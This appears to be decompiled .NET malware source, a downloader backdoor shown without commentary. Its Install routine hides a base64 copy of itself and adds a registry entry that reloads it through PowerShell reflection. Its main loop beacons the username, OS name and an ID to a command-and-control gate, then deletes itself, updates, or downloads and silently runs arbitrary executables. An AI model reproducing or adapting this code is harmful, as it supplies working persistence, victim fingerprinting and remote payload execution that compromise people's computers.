// Token: 0x06000009 RID: 9 RVA: 0x000023A4 File Offset: 0x000005A4 public static void Install() { string contents = Convert.ToBase64String(File.ReadAllBytes(Environment.GetCommandLineArgs()[0])); File.AppendAllText(Constants.CODE_BASE, contents); File.SetAttributes(Constants.CODE_BASE, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System); UtilActions.MicroSleep(); Registry.CurrentUser.CreateSubKey("LANMedia2").SetValue("MPEG4Base", string.Format("([System.Reflection.Assembly]::Load([System.Convert]::FromBase64String([System.IO.File]::ReadAllText(\"{0}\")))).EntryPoint.Invoke($null,$null)", Constants.CODE_BASE)); }
// Token: 0x06000003 RID: 3 RVA: 0x0000213C File Offset: 0x0000033C private static void Main() { UtilActions.MicroSleep(); SelfActions.StartUP(); UtilActions.RegularSleep(); if (File.Exists(Constants.CODE_BASE)) { UtilActions.MicroSleep(); string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), "*.exe"); for (int i = 0; i < files.Length; i++) { string path = files[i]; try { File.SetAttributes(path, FileAttributes.Normal); File.Delete(path); } catch { } } using (WebClient webClient = new WebClient()) { while (true) { try { string text = webClient.DownloadString(Constants.GATE_URL + UtilActions.BuildQuery()); if (!(text == "D0AF5460E3FA6BE33399A12408D06917FD4DC81308E19AD4B2580BE040DC91954FD58A4242BEEE0B8ECB31097726FDA0DB93CBA325F939E6305A1767886614E7")) { if (!(text == "D000000F")) { if (!(text == "0E8AC9B2E716A0C3713AA6E34C02688BB4DDC0645483411710BFEDE69D15DAA49ACD44F067280C97E693E083D19008B5DE7968761A6083040349C0A785FF989F")) { SelfActions.ExecutePE(text); } else { SelfActions.Update(); } } } else { SelfActions.Delete(); } } catch { } UtilActions.RegularSleep(); } } } UtilActions.MicroSleep(); SelfActions.Install(); }
// Token: 0x06000010 RID: 16 RVA: 0x000024B8 File Offset: 0x000006B8 public static string BuildQuery() { string iD = UtilActions.GetID(); string text = Uri.EscapeDataString(Environment.GetEnvironmentVariable("USERNAME")); string text2 = Uri.EscapeDataString(UtilActions.GetDWORD(Constants.REG_PRODUCT_PATH, "ProductName")); string text3 = Uri.EscapeDataString(UtilActions.GetVersion()); return(string.Format("?E19AD4B2580B={0}&EFF0BCFAA={1}&HC619F6C1A={2}&A27BF6210={3}", new object[] { iD, text, text2, text3 })); }
// Token: 0x06000007 RID: 7 RVA: 0x000022CC File Offset: 0x000004CC public static void ExecutePE(string page) { List <string> expr_1A = new List <string>(page.Split(new string[] { "/" }, StringSplitOptions.RemoveEmptyEntries)); string str = expr_1A[expr_1A.Count - 1]; string fileName = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + "\\" + str; using (WebClient webClient = new WebClient()) { webClient.DownloadFile(page, fileName); } UtilActions.RegularSleep(); Process.Start(new ProcessStartInfo { CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden, FileName = fileName }); }
// Token: 0x0600000E RID: 14 RVA: 0x00002456 File Offset: 0x00000656 public static string GetVersion() { return(UtilActions.Harp1(File.ReadAllText(Constants.CODE_BASE))); }